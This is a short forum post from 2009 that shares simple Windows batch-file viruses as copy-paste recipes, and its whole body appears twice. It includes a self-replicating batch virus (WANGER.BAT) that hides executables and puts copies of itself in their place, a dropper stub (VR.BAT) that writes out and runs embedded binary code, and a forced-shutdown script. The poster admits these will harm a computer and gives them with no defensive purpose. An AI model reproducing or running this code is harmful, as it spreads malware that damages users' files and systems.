Ranqe skill
08-25-2009, 01:41 AM
do NOT test any of these, for they will most likely harm your computer.
Lols i have allot of haters for posting these, but i dont really care :D
these are all really simple rofl.
Get a notepad up, and c/p this:
@ECHO OFF
REM <binary code>
copy %0 b.com>nul
b.com
del b.com
rem <binary code>
save it as VR.BAT
Get notepad and c/p this:
@echo off
ctty nul
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
and save this as WANGER.BAT
And for this one, turnning off a computer, very simple.
shutdown -f
save it as forcedown.bat
There is no point in doing any of these, so, yea.
Lols i have allot of haters for posting these, but i dont really care :D
these are all really simple rofl.
Get a notepad up, and c/p this:
@ECHO OFF
REM <binary code>
copy %0 b.com>nul
b.com
del b.com
rem <binary code>
save it as VR.BAT
Get notepad and c/p this:
@echo off
ctty nul
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
and save this as WANGER.BAT
And for this one, turnning off a computer, very simple.
shutdown -f
save it as forcedown.bat
There is no point in doing any of these, so, yea.